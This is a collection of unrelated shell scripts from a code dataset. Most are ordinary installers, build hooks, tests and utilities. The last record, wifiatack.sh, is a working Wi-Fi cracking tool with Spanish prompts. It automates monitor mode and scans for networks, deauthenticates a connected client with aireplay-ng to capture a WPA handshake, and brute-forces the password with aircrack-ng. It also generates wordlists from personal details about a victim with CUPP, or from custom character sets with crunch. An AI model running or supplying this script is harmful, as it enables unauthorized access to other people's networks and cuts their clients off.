assert_equals '++++++++++' "${answer}"
| true
|
1b0d65fed554623bba0830cd77737efb078d0019
|
Shell
|
id774/scripts
|
/installer/install_django.sh
|
UTF-8
| 1,815
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/sh
#
########################################################################
# Install Django
# $1 = python path
# $2 = django version
# $3 = django minor version
# $4 = not save to src
# $5 = nosudo
#
# Maintainer: id774 <idnanashi@gmail.com>
#
# v2.0 10/24,2013
# Install for stable version.
# v1.3 3/7,2010
# Refactoring.
# v1.2 2/23,2010
# Implement svn up and build.
# v1.1 2/20,2010
# Refactoring.
# v1.0 9/8,2008
# Stable.
########################################################################
setup_environment() {
test -n "$1" || PYTHON_PATH=/usr/bin/python
test -n "$1" && PYTHON_PATH=$1
test -n "$2" || DJANGO_VERSION=1.6
test -n "$2" && DJANGO_VERSION=$2
test -n "$3" || DJANGO_MINOR_VERSION=1.6
test -n "$3" && DJANGO_MINOR_VERSION=$3
test -n "$5" || SUDO=sudo
test -n "$5" && SUDO=
test "$5" = "sudo" && SUDO=sudo
case $OSTYPE in
*darwin*)
OWNER=root:wheel
OPTIONS=-pR
;;
*)
OWNER=root:root
OPTIONS=-a
;;
esac
}
save_sources() {
test -d /usr/local/src/django || $SUDO mkdir -p /usr/local/src/django
$SUDO cp $OPTIONS Django-$DJANGO_VERSION /usr/local/src/django
sudo chown -R $OWNER /usr/local/src/django
}
install_stable() {
mkdir install_django
cd install_django
wget https://www.djangoproject.com/m/releases/$DJANGO_MINOR_VERSION/Django-$DJANGO_VERSION.tar.gz
tar xzvf Django-$DJANGO_VERSION.tar.gz
cd Django-$DJANGO_VERSION
$SUDO $PYTHON_PATH setup.py install
cd ..
test -n "$4" || save_sources
cd ..
$SUDO rm -rf install_django
}
install_django() {
setup_environment $*
install_stable $*
django-admin.py --version
}
ping -c 1 id774.net > /dev/null 2>&1 || exit 1
install_django $*
| true
|
2866027eabc2ce23aa46d622ed5f60447335d734
|
Shell
|
weilaidb/PythonExample
|
/regularexpress/home/weilaidb/software/git-2.0.5/t/t6002-rev-list-bisect.sh
|
UTF-8
| 3,500
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/sh
#
# Copyright (c) 2005 Jon Seymour
#
test_description='Tests git rev-list --bisect functionality'
. ./test-lib.sh
. "$TEST_DIRECTORY"/lib-t6000.sh # t6xxx specific functions
# usage: test_bisection max-diff bisect-option head ^prune...
#
# e.g. test_bisection 1 --bisect l1 ^l0
#
test_bisection_diff()
date >path0
git update-index --add path0
save_tag tree git write-tree
on_committer_date "00:00" hide_error save_tag root unique_commit root tree
on_committer_date "00:01" save_tag l0 unique_commit l0 tree -p root
on_committer_date "00:02" save_tag l1 unique_commit l1 tree -p l0
on_committer_date "00:03" save_tag l2 unique_commit l2 tree -p l1
on_committer_date "00:04" save_tag a0 unique_commit a0 tree -p l2
on_committer_date "00:05" save_tag a1 unique_commit a1 tree -p a0
on_committer_date "00:06" save_tag b1 unique_commit b1 tree -p a0
on_committer_date "00:07" save_tag c1 unique_commit c1 tree -p b1
on_committer_date "00:08" save_tag b2 unique_commit b2 tree -p b1
on_committer_date "00:09" save_tag b3 unique_commit b2 tree -p b2
on_committer_date "00:10" save_tag c2 unique_commit c2 tree -p c1 -p b2
on_committer_date "00:11" save_tag c3 unique_commit c3 tree -p c2
on_committer_date "00:12" save_tag a2 unique_commit a2 tree -p a1
on_committer_date "00:13" save_tag a3 unique_commit a3 tree -p a2
on_committer_date "00:14" save_tag b4 unique_commit b4 tree -p b3 -p a3
on_committer_date "00:15" save_tag a4 unique_commit a4 tree -p a3 -p b4 -p c3
on_committer_date "00:16" save_tag l3 unique_commit l3 tree -p a4
on_committer_date "00:17" save_tag l4 unique_commit l4 tree -p l3
on_committer_date "00:18" save_tag l5 unique_commit l5 tree -p l4
git update-ref HEAD $(tag l5)
# E
# / \
# e1 |
# | |
# e2 |
# | |
# e3 |
# | |
# e4 |
# | |
# | f1
# | |
# | f2
# | |
# | f3
# | |
# | f4
# | |
# e5 |
# | |
# e6 |
# | |
# e7 |
# | |
# e8 |
# \ /
# F
on_committer_date "00:00" hide_error save_tag F unique_commit F tree
on_committer_date "00:01" save_tag e8 unique_commit e8 tree -p F
on_committer_date "00:02" save_tag e7 unique_commit e7 tree -p e8
on_committer_date "00:03" save_tag e6 unique_commit e6 tree -p e7
on_committer_date "00:04" save_tag e5 unique_commit e5 tree -p e6
on_committer_date "00:05" save_tag f4 unique_commit f4 tree -p F
on_committer_date "00:06" save_tag f3 unique_commit f3 tree -p f4
on_committer_date "00:07" save_tag f2 unique_commit f2 tree -p f3
on_committer_date "00:08" save_tag f1 unique_commit f1 tree -p f2
on_committer_date "00:09" save_tag e4 unique_commit e4 tree -p e5
on_committer_date "00:10" save_tag e3 unique_commit e3 tree -p e4
on_committer_date "00:11" save_tag e2 unique_commit e2 tree -p e3
on_committer_date "00:12" save_tag e1 unique_commit e1 tree -p e2
on_committer_date "00:13" save_tag E unique_commit E tree -p e1 -p f1
on_committer_date "00:00" hide_error save_tag U unique_commit U tree
on_committer_date "00:01" save_tag u0 unique_commit u0 tree -p U
on_committer_date "00:01" save_tag u1 unique_commit u1 tree -p u0
on_committer_date "00:02" save_tag u2 unique_commit u2 tree -p u0
on_committer_date "00:03" save_tag u3 unique_commit u3 tree -p u0
on_committer_date "00:04" save_tag u4 unique_commit u4 tree -p u0
on_committer_date "00:05" save_tag u5 unique_commit u5 tree -p u0
on_committer_date "00:06" save_tag V unique_commit V tree -p u1 -p u2 -p u3 -p u4 -p u5
test_sequence()
test_sequence "--bisect"
#
#
test_done
| true
|
3a19efb4ee8079f613b0b5675d72691d51b17f23
|
Shell
|
themonki/recipes-deploy-vagrant
|
/trabajoGrado/Prototipe/PrototipeGTKInterface/scripts/cancel-job.sh
|
UTF-8
| 736
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
# -*- mode: sh -*-
# vi: set ft=sh :
##Script que cancela un job dado su contact
USER_PASS=""
STRING_CONTACT=""
export PATH_PROXY_VALIDACION=$PWD_PROTOTIPEGTK_SCRIPTS/proxyValidacion.sh
file_exists() {
FILE=$1
if [ -e $FILE ]; then
return 0;
else
return 1;
fi
}
function print_error {
printf '%s\n' "";
printf '%s\n' "Error: Parámetros incorrectos.";
}
function cancel_job {
if [[ $STRING_CONTACT != "" ]] ; then
$PATH_PROXY_VALIDACION -q -p $USER_PASS
VALUE=$(globusrun -k $STRING_CONTACT);
printf '%s\n' "$VALUE";
fi
}
while getopts 'p: s:' option;
do
case "$option"
in
p) USER_PASS="$OPTARG";;
s) STRING_CONTACT="$OPTARG";;
*) print_error; exit 2;;
esac
done
cancel_job
| true
|
ae6020e986e34eda111fed75a94c95d61333af67
|
Shell
|
alejandro2014/recipes
|
/generate
|
UTF-8
| 112
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/bash
for recipe in `ls *.md | cut -f 1 -d "."`; do
pandoc ${recipe}.md -s -o ./html/${recipe}.html
done
| true
|
2d0d6d6672ee4fd1757791a3b417f943459b80aa
|
Shell
|
global-121/121-platform
|
/tools/git-hooks/pre-commit
|
UTF-8
| 1,497
| 3.203125
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# git hook to run a command before actually committing when running `git commit`:
#
check_if_need_to_lint() {
if git diff --cached --name-only | grep --quiet "$1*"
then
cd "$(git rev-parse --show-toplevel)" || exit
npm run lint --if-present --prefix "$1"
fi
}
# Include all packages/applications that support an `npm run lint` task:
check_if_need_to_lint "interfaces/PA-App/"
check_if_need_to_lint "interfaces/AW-App/"
check_if_need_to_lint "interfaces/HO-Portal/"
check_if_need_to_lint "services/121-service/"
# Warn about files to keep in sync:
#
# warn: `tput setaf 3`
# standout: `tput smso`
# standout End: `tput rmso`
# reset: `tput sgr0`
check_if_need_to_be_in_sync() {
if git diff --cached --name-only | grep --quiet "$1*"
then
echo " "
echo "$(tput setaf 3)$(tput smso) ! $(tput sgr0) Make sure to keep $(tput smso) $1 $(tput sgr0) in sync between all interfaces!"
echo " "
fi
}
check_if_need_to_be_in_sync ".editorconfig"
check_if_need_to_be_in_sync ".prettierignore"
check_if_need_to_be_in_sync ".prettierrc.yml"
check_if_need_to_be_in_sync ".vscode/settings.json"
check_if_need_to_be_in_sync "app/shared/dialogue-turn"
check_if_need_to_be_in_sync "app/shared/q-and-a-set"
check_if_need_to_be_in_sync "app/shared/numeric-input"
check_if_need_to_be_in_sync "app/shared/phone-number-input"
check_if_need_to_be_in_sync "app/services/api.service"
check_if_need_to_be_in_sync "app/services/translatable-string"
| true
|
f0f1658a706a4fb84dccf9cb6e81a37a7783eb1d
|
Shell
|
wruibo/tools
|
/shell/line_counter.sh
|
UTF-8
| 611
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/sh
usage=" Usage:\n
\t$0 <path> <name> <limit>\n
count the line number of files match <name> in the <path> which line number less than <limit>"
if [ $# -lt 2 ]
then
echo $usage
exit 0
fi
path=$1
name=$2
limit=10000
if [ $# -gt 2 ]
then
limit=$3
fi
echo $limit
echo "counting the line number of file $name in $path..."
total_line=0
files=`find $path -iname $name`
for file in $files
do
echo $file
line=`wc -l $file | awk '{print $1}'`
if [ $line -lt $limit ]
then
total_line=$(($total_line+$line))
echo "$line in file: $file"
fi
done
echo "job done, total line number is: $total_line"
| true
|
ac958135e32dbae539f067b83fe259d64d455de5
|
Shell
|
Duanzuning/Test
|
/gensim.sh
|
UTF-8
| 1,566
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
for((i=29;i>=29;i--));do
run_date=`date +%Y-%m-%d --date="-${i} day"`
rundate=`date +%Y%m%d --date="-${i} day"`
day=`date +%d --date="-${i} day"`
month=`date +%m --date="-${i} day"`
week_day=`date +%w --date="-${i} day"`
week_number=`date +%W --date="-${i} day"`
week=`date +%W --date="-${i} day"`
corpusdir="/home/dzn/hd/corpus"
corpusbackup="/home/dzn/hd/corpus_backup"
docsdir="/home/dzn/Hd_news"
pyscrips="/home/dzn/py_tools"
corpuspath=${corpusdir}/seedcorpus.txt
indexpath=${corpusdir}/seedindex.txt
# Create Corpus File
if [ ${day} == 01 ];then
rm -rf ${corpusdir}/month_${month}
mkdir ${corpusdir}/month_${month}
rm -rf ${corpuspath} ${indexpath}
touch ${corpuspath} ${indexpath}
fi
corpusday=${corpusdir}/month_${month}/${rundate}
rm -rf ${corpusday}
mkdir ${corpusday}
cd ${corpusday}
filepath=${docsdir}/month_${month}/${rundate}
${pyscrips}/jieba_gensim.py -i ${filepath} -c ${corpusday} -r ${rundate} -o ${indexpath} > ${corpusday}/gensim_${rundate}.log
if [ $? == 0 ];then
cat ${corpusbackup}/seedindex.txt ${corpusday}/seedindex_${rundate}.txt > ${indexpath}
cat ${corpusbackup}/seedcorpus.txt ${corpusday}/seedcorpus_${rundate}.txt > ${corpuspath}
${pyscrips}/gensim_cluster.py -i ${indexpath} -c ${corpuspath} -d ${corpusdir} -r ${rundate} -p ${corpusday} > ${corpusday}/updatecluster_${rundate}.log
mv -f ${corpusdir}/seedcorpus_${rundate}.txt ${corpuspath}
rm -rf ${corpusdir}/index.0
#if [ $? == 0 ];then
#cp -f ${indexpath} ${corpusbackup}/seedindex.txt
#cp -f ${corpuspath} ${corpusbackup}/seedcorpus.txt
#fi
fi
done
| true
|
833415ab90a491c7bc1b7777b83649d9b2e6a62a
|
Shell
|
jingapore/command_line_scripting
|
/getopts.sh
|
UTF-8
| 1,360
| 3.84375
| 4
|
[] |
no_license
|
while getopts :h opt; do
case ${opt} in
h)
echo "Usage:"
echo " pip -h"
echo " pip install <package>"
exit 0
;;
\?)
echo "Invalid Option: -$OPTARG"
exit 1
;;
# a)
# echo "Now at option a"
# echo "Args for option a is $OPTARG"
# exit 0
# ;;
esac
done
#this will execute only if option is not passed
subcommand=$1;
case $subcommand in
install)
shift; #shift causes the string after install, to be next argument
package=$1; shift;
echo "Package is $package";
while getopts ":t:" opt; do
case ${opt} in
t)
echo "Parsing option ${opt}"
echo "Argument is $OPTARG" #note that we do not exit here, so as to parse argument after option -t
echo "Option index is $OPTIND"
;;
\?)
echo "Parsing option ${opt}"
echo "Option index is $OPTIND"
;;
:)
echo "Invalid option: -$OPTARG requires an argument"
echo "Option index is $OPTIND"
# exit 1
;;
esac
done
esac
| true
|
123c77a8d87fc2d97ea9798ab3ef2dcf6f490212
|
Shell
|
J-U-B/OPSI-dotnet-check
|
/OPSI/postinst
|
UTF-8
| 2,518
| 3.859375
| 4
|
[] |
no_license
|
#! /bin/bash
#=====================================================================
# postinst script
# This script executes after unpacking files from that archive and registering the product at the depot.
#
# The following environment variables can be used to obtain information about the current installation:
# PRODUCT_ID: id of the current product
# CLIENT_DATA_DIR: directory which contains the installed client data
#=====================================================================
# J. Boettge <boettge@mpi-halle.mpg.de> 2021-02-01 15:15:00 +0100
#=====================================================================
LOGFILE=/tmp/${PRODUCT_ID}__opsi_package_install.log
exec >> $LOGFILE
exec 2>&1
chgrp opsiadmin $LOGFILE
chmod g+rw $LOGFILE
echo "=================================================="
echo "${PRODUCT_ID} POSTINST LOG"
echo "=================================================="
SRC="${CLIENT_DATA_DIR}/../../source/${PRODUCT_ID##0_}"
DST="${CLIENT_DATA_DIR}/files"
# remove trailing "/" in path:
DST=${DST%\/}
ERR=0
### check for testing and O4I package:
P=${PRODUCT_ID}
[ "${P}" = "${P##0_}" -a "${P}" = "${P##test_}" ] && IS_TESTING=false || IS_TESTING=true
P=${P/#0_/}
P=${P/#test_/}
[ "${P}" = "${P##o4i_}" ] && IS_O4I=false || IS_O4I=true
if [ $IS_O4I == true ]; then
[ ! -d "${DST}" ] && mkdir $DST
else
### symlink files directory to ../../source/${PRODUCT_ID##0_} only
### for non-O4I packages:
if [ -h "${DST}" ]; then
echo "Symlink to [${DST}] already exists. - Replacing"
rm ${DST}
fi
if [ ! -d "${SRC}" ]; then
echo "Directory [${SRC}] does not exist. Try to create it."
mkdir -m 750 ${SRC} && chgrp pcpatch ${SRC}
fi
if [ -d "${DST}" ]; then
echo "Directory [${DST}] already exists!\nSkipping creation of symlink."
elif [ -f "${DST}" ]; then
echo "File [${DST}] already exists!\nSkipping creation of symlink."
else
ln -s ${SRC} ${DST}
fi
fi
### restore custom directories
TMP_DIR=${CLIENT_DATA_DIR}/../${PRODUCT_ID}.tmp
if [ -d $TMP_DIR ]; then
echo 'Restoring previous directories...'
for DIRNAME in custom files; do
echo "* [${DIRNAME}]"
if [ -d $TMP_DIR/${DIRNAME} ]; then
test -e $CLIENT_DATA_DIR/${DIRNAME} && rm -rf $CLIENT_DATA_DIR/${DIRNAME}
echo -e "\tmoving $TMP_DIR/${DIRNAME} to $CLIENT_DATA_DIR/"
mv $TMP_DIR/${DIRNAME} $CLIENT_DATA_DIR/ || exit 1
else
echo -e "\tdoes not exist here"
fi
done
fi
echo "Removing temporary files..."
rm -rf $TMP_DIR
### download files form vendor:
#...not required here
exit $ERR
| true
|
563b91d9d58e855856d6c051cda0f2372f07c514
|
Shell
|
htown101/Networking
|
/fizzbuzzpt2
|
UTF-8
| 404
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
# program: Fizzbuzz part 2
# Heather McMillen
# Date of last revision: 3/3/2013
num=1
value=0
echo -n "Enter a number > "
read value
while [ $num -lt $value ]
do
if [ $(($num % 3)) -eq "0" ]; then
echo "fizz"
elif [ $(($num % 5)) -eq "0" ]; then
echo "buzz"
elif [ $(($num % 3)) -eq "0" -a $(($num % 5)) -eq "0" ]; then
echo "fizzbuzz"
else
echo "$num"
fi
num=$((num + 1))
done
| true
|
8f7508b1ea89e7bb023fafecb385e6f60f601fe3
|
Shell
|
RedHatGov/redhatgov.workshops
|
/container_security/files/nodes/registry-files/gen-certs/gen-cert.sh
|
UTF-8
| 787
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Edit myserver.cnf and set the FQDN and ORGNAME variables to reflect your system then run this script.
#
if [ -f /home/ec2-user/files/cert.pem -a -f /home/ec2-user/files/key.pem ]; then
echo "Using existing certificate and key from '/home/ec2-user/files'."
cp /home/ec2-user/files/cert.pem myserver.cert
cp /home/ec2-user/files/key.pem myserver.key
else
touch myserver.key
chmod 600 myserver.key
openssl req -new -newkey rsa:4096 -nodes -sha256 -config myserver.cnf -keyout myserver.key -out myserver.csr
#openssl x509 -signkey myserver.key -in myserver.csr -req -days 2000 -out myserver.cert
openssl x509 -signkey myserver.key -in myserver.csr -req -extfile myserver.cnf -days 2000 -out myserver.cert
openssl x509 -noout -text -in myserver.cert | head -10
fi
| true
|
070ec6dd2643af05ba62b03f3375bbd16dd588b5
|
Shell
|
willghatch/dotfileswgh
|
/commands/racket-dev-environment.sh
|
UTF-8
| 467
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
NIXFILE=$DOTFILESWGH/nixos/racket/racket-env.nix
if test "$1" = "fhs"; then
NIXFILE=$DOTFILESWGH/nixos/racket/racket-fhs-env.nix
fi
if test -f /etc/NIXOS; then
exec nix-shell $NIXFILE --pure \
--keep CURRENT_DEV_PATH \
--keep CURRENT_DEV_MODE \
--keep EMACS_DOT_D_PATH \
--keep LANG \
--command $DOTFILESWGH/nixos/racket/racket-post-env.sh
else
echo "Now only supporting NixOS..." 1>&2
exit 1
fi
| true
|
30cc6a70ba76fca79fa51aefddc294c3d4290136
|
Shell
|
meedan/alegre
|
/postgres/shared-sync.sh
|
UTF-8
| 168
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
SRC=${SRC:-/opt/shared}
DEST=${DEST:-/usr/share/postgresql/$PG_MAJOR}
if [ -e $SRC/* ] ; then
echo "Sync $SRC.."
cp -rf $SRC/* $DEST
fi
| true
|
8877c76803389dac4e826ee02f5f5190221d6fe4
|
Shell
|
ilaaridh/Kaldi-for-ASR-of-Swiss-German
|
/archimob/extract_audio.sh
|
UTF-8
| 1,732
| 4.4375
| 4
|
[] |
no_license
|
#!/bin/bash
# This script extracts the audio from a set of input videos, and converts it
# to one channel linear pcm, 16 bits, 8KHz.
#
# Input:
# 1.- input_dir: folder to take the input videos. Note that only the files
# with .mp4 extension will be processed. Change $INPUT_EXTENSION below to
# consider other extensions (note the actual supported ones depends on
# ffmpeg)
# 2.- output_folder: folder to write the wavefiles. The name will be the
# one of the original videos, with .wav extension.
#
################
# Configuration:
################
INPUT_EXTENSION='mp4'
SAMPLE_RATE=8000
CODEC=pcm_s16le # Check ffmpeg -codecs for other possibilities
echo $0 $@
if [[ $# -ne 2 ]]; then
echo "$0 input_files_dir output_folder"
exit 1
fi
###################
# Input parameters:
###################
input_dir=$1
output_dir=$2
###############
# Intermediate:
###############
log_dir="$output_dir/wav_log"
# Check whether ffmpeg is installed:
type ffmpeg &> /dev/null
[[ $? -ne 0 ]] && echo 'Error: ffmpeg is not installed' && exit 1
# Check whether the input folder actually exists:
[[ ! -d $input_dir ]] && echo "Error: missing input folder $input_dir" && exit 1
# Create output folders:
mkdir -p $output_dir $log_dir
# Process the videos:
for f in `ls $input_dir/*.$INPUT_EXTENSION`; do
echo "Processing $f..."
input_filename=`basename $f`
base_output="${input_filename%.*}"
output_file=$output_dir/$base_output.wav
log_file="$log_dir/$base_output.log"
echo $output_file
ffmpeg -i $f -vn -ac 1 -acodec $CODEC -ar $SAMPLE_RATE -y $output_file \
&> $log_file
[[ $? -ne 0 ]] && echo "Error processing $f. See $log_file" \ && exit 1
done
echo "Done: $0"
| true
|
90cc13a0be8bd45be97d1f8b0a58fae84ac5aef5
|
Shell
|
Raidenkyu/FEUP-SSIM
|
/bin/optimize
|
UTF-8
| 160
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/sh
if [ $# -ne "1" ]; then
echo "Error: Number of steps missing."
echo "Usage: bin/train <integer>"
exit 0
fi
python3 src/optimizer.py auto "$1"
| true
|
2f39f8a035148c878847855a333899d94e8b8701
|
Shell
|
krailis/hackerrank-solutions
|
/Linux_Shell/Bash/Arithmetic_Operations.sh
|
UTF-8
| 144
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
read X
#Y=$(echo "scale=3;$X" | bc)
#echo "$Y"
#echo $(printf %.$3f $(echo "scale=3;$X" | bc))
printf "%.3f\n" "$(bc -l <<< "$X")"
| true
|
7ebaecb14cf5e3471d44aad891af7495b6a46cbc
|
Shell
|
DadaIsCrazy/languages-perfs
|
/src/primes.sh
|
UTF-8
| 431
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
MAX=$1;
nums=()
# 0 and 1 are not primes
nums[0]=1
nums[1]=1
# Computing prime numbers
for (( i=2; i <= $(bc <<< "sqrt($MAX)"); ++i ))
do
if [ ! ${nums[$i]} ]
then
for (( j=i*i; j < MAX; j+=i ))
do
nums[$j]=1
done
fi
done
# Counting prime numbers
total=0
for (( i=0; i < $MAX; ++i ))
do
if [ ! ${nums[$i]} ]
then
((total++))
fi
done
echo $total
| true
|
664fc29ad22e2bf8fd9446deb97a3355a188df23
|
Shell
|
cripton666/evilatack
|
/wifiatack.sh
|
UTF-8
| 9,017
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
#creador del script jaime manquel(cripton666)
#Derechos reservados de autor
#Codigo personal se puede copiar pero dejar credito
#herramienta dedicada para poder crear diccionario personalizado y normal
#y realizar el hackeo automatizado
#Esta herramienta cuenta con la herramienta CUPP que nos permite crear diccionarios de fuerza bruta
#dejo sus derechos y los creditos a el o los programadores de esta herramienta
#en el cual su pagina de github es https://github.com/Mebus
trap ctrl_c INT
function ctrl_c(){
limpiar
echo -e "\e[1;33mSaliendo del script...\e[0m"
sleep 1s
limpiar
exit 0
}
function limpiar(){
clear
}
limpiar
sleep 1s
echo
echo
echo -e "\e[1;31m ▄█ █▄ ▄█ ▄████████ ▄█ ▄████████ ███ ▄████████ ▄████████ ▄█ ▄█▄ \e[0m"
echo -e "\e[1;31m███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ███ ███ ███ ███ ▄███▀ \e[0m"
echo -e "\e[1;31m███ ███ ███▌ ███ █▀ ███▌ ███ ███ ▀███▀▀██ ███ ███ ███ █▀ ███▐██▀ \e[0m"
echo -e "\e[1;31m███ ███ ███▌ ▄███▄▄▄ ███▌ ███ ███ ███ ▀ ███ ███ ███ ▄█████▀ \e[0m"
echo -e "\e[1;31m███ ███ ███▌ ▀▀███▀▀▀ ███▌ ▀███████████ ███ ▀███████████ ███ ▀▀█████▄ \e[0m"
echo -e "\e[1;31m███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███▐██▄ \e[0m"
echo -e "\e[1;31m███ ▄█▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███▄ \e[0m"
echo -e "\e[1;31m ▀███▀███▀ █▀ ███ █▀ ███ █▀ ▄████▀ ███ █▀ ████████▀ ███ ▀█▀ \e[0m"
echo -e "\e[1;31m ▀ \e[0m"
echo
echo
sleep 1s
echo -e "\e[1;31m [*]\e[0m \e[96mDerechos reservados para el programador\e[0m \e[1;37m(cripton666)\e[0m"
echo
echo -e "\e[1;31m [1]\e[0m \e[1;33mWifi atack\e[0m"
echo -e "\e[1;31m [2]\e[0m \e[1;33mDiccionario(con los Datos de la victima)\e[0m"
echo -e "\e[1;31m [3]\e[0m \e[1;33mDiccionario(Personalizado)\e[0m"
echo -e "\e[1;31m [4]\e[0m \e[1;33mSalir\e[0m"
echo
while :
do
opcion=0
sleep 1s
echo -n -e "\e[1;37m Elige una opcion :\e[0m"
read opcion
case $opcion in
1)
#cripton666 (jaime manquel) creador del script
#herramineta diseñada para el hackeo de redes wifi wpa wpa1 wpa2 via diccionario
trap ctrl_c INT
function ctrl_c(){
echo -e "\e[1;33mSaliendo del script...\e[0m"
rm dnsmasq.conf hostapd.conf 2>/dev/null
rm -r iface 2>/dev/null
find \-name datos-privados.txt | xargs rm 2>/dev/null
sleep 3; ifconfig wlan0mon down 2>/dev/null; sleep 1
iwconfig wlan0mon mode monitor 2>/dev/null; sleep 1
ifconfig wlan0mon up 2>/dev/null; airmon-ng stop wlan0mon > /dev/null 2>&1; sleep 1
tput cnorm; service network-manager restart
exit 0
}
function limpiar_pantalla {
clear
}
limpiar_pantalla
echo
echo
echo
echo -e "\e[0;35m ██╗ ██╗██╗███████╗██╗ █████╗ ████████╗ █████╗ ██████╗██╗ ██╗ \e[0m"
echo -e "\e[0;35m ██║ ██║██║██╔════╝██║ ██╔══██╗╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝\e[0m"
echo -e "\e[0;35m ██║ █╗ ██║██║█████╗ ██║ ███████║ ██║ ███████║██║ █████╔╝ \e[0m"
echo -e "\e[0;35m ██║███╗██║██║██╔══╝ ██║ ██╔══██║ ██║ ██╔══██║██║ ██╔═██╗ \e[0m"
echo -e "\e[0;35m ╚███╔███╔╝██║██║ ██║ ██║ ██║ ██║ ██║ ██║╚██████╗██║ ██╗ \e[0m"
echo -e "\e[0;35m ╚══╝╚══╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝ \e[0m"
echo
echo
sleep 2s
echo -e "\e[1;37m [:)]\e[0m \e[96mDerechos reservados del programador\e[0m \e[1;37m(cripton666)\e[0m"
sleep 2s
echo
echo -e "\e[1;31m [*]\e[0m \e[1;33mNo todas las targetas de red admiten modo monitor\e[0m"
echo
sleep 1s
echo -e "\e[1;31m [*]\e[0m \e[1;33mwlan0\e[0m"
sleep 1s
echo -e "\e[1;31m [*]\e[0m \e[1;33mwlan1\e[0m"
sleep 1s
echo -e "\e[1;31m [*]\e[0m \e[1;33mwlan2\e[0m"
xterm -hold -e "iwconfig" &
airodump_xterm_PID=$!
echo
sleep 1s
echo -n -e "\e[1;31m Seleccione su targeta de red :\e[0m"
read TARGETA
limpiar_pantalla
echo
echo -e "\e[1;31m[*]\e[0m \e[1;33mwlan0mon\e[0m"
echo -e "\e[1;31m[*]\e[0m \e[1;33mwlan1mon\e[0m"
echo -e "\e[1;31m[*]\e[0m \e[1;33mwlan2mon\e[0m"
echo
echo -n -e "\e[1;31mSeleccione extencion de targeta wlan0,1,2 EJ:(wlan0mon):\e[0m"
read wlan0
limpiar_pantalla
echo -e "\e[1;31m[*]\e[0m \e[1;33m Estableciendo a modo monitor\e[0m"
sleep 2s
sudo airmon-ng start $TARGETA
limpiar_pantalla
echo -e "\e[1;31m[*]\e[0m \e[1;33m Conectado con exito\e[0m"
sleep 2s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Matando conecciones conflictivas\e[0m"
sleep 3s
killall network-manager hostapd dnsmasq wpa_supplicant dhcpd > /dev/null 2>&1
echo -e "\e[1;31m[*]\e[0m \e[1;33m Dhclient\e[0m"
sleep 3s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Network-manager\e[0m"
sleep 3s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Wpasupplicant\e[0m"
sleep 2s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Creando carpeta de captura\e[0m"
sleep 2s
mkdir Capturas
echo -e "\e[1;31m[*]\e[0m \e[1;33m Creada con exito\e[0m"
cd Capturas
echo -e "\e[1;31m[*]\e[0m \e[1;33m Escaneando redes sercanas disponibles\e[0m"
sleep 4s
xterm -hold -e "sudo airodump-ng $wlan0" &
airodump_xterm_PID=$!
limpiar_pantalla
echo -n -e "\e[1;31mSeleccione la mac bssid de la red que desea atacar :\e[0m"
read red
sleep 2s
echo -n -e "\e[1;31mSeleccione el canal ch de la red :\e[0m"
read CH
echo -n -e "\e[1;31mSeleccione un nombre para la captura :\e[0m"
read CAPTURA
limpiar_pantalla
xterm -hold -e "sudo airodump-ng -c $CH -w $CAPTURA --bssid $red $wlan0" &
airodump_xterm_PID=$!
echo -e "\e[1;31m[*]\e[0m \e[1;33m Vamos a desautenticar a un cliente conectado\e[0m"
sleep 2s
echo -n -e "\e[1;31mSeleccione la mac station de la red :\e[0m"
read USUARIO
limpiar_pantalla
sleep 2s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Desautenticando a usuario\e[0m"
sleep 1s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Interactuando con cliente \e[0m"
sudo aireplay-ng -0 20 -a $red -c $USUARIO $wlan0
limpiar_pantalla
echo -e "\e[1;31m[*]\e[0m \e[1;33m Coneccion exitosa \e[0m"
echo
sleep 1s
echo -e "\e[1;31m[*]\e[0m \e[1;33m No continue hasta tener el handshaker \e[0m"
sleep 2s
echo -n -e "\e[1;31mPara terminar pone el nombre de la captura con su extencion :\e[0m"
read EXTENCION
sleep 2s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Vamos a intentar descriptar la contraseña\e[0m"
sleep 2s
echo -n -e "\e[1;31mSeleccione la ruta del diccionario :\e[0m"
read DICCIONARIO
limpiar_pantalla
sudo aircrack-ng -w $DICCIONARIO -b $red $EXTENCION
read enterkey
;;
2)
limpiar
cd cupp
python3 cupp.py -i
read enterkey
;;
3)
limpiar
echo -e "\e[1;33mRecopilando datos para crear el diccionario\e[0m"
sleep 1s
echo
echo -n -e "\e[1;33mIngrese el minimo de caracteres :\e[0m"
read minimo
sleep 1s
echo
echo -n -e "\e[1;33mIngrese el maximo de caracteres :\e[0m"
read maximo
sleep 1s
echo
echo -n -e "\e[1;33mIngrese los caracteres del diccionario :\e[0m"
read diccionario
sleep 1s
echo
echo -n -e "\e[1;33mNombre del diccionario y al final agregar .txt :\e[0m"
read nombre
sleep 1s
limpiar
echo -e "\e[1;33mCreando diccionario"
crunch $minimo $maximo $diccionario -o $nombre
limpiar
echo -e "\e[1;33mCreado con exito\e[0m"
sleep 3s
./wifiatack.sh
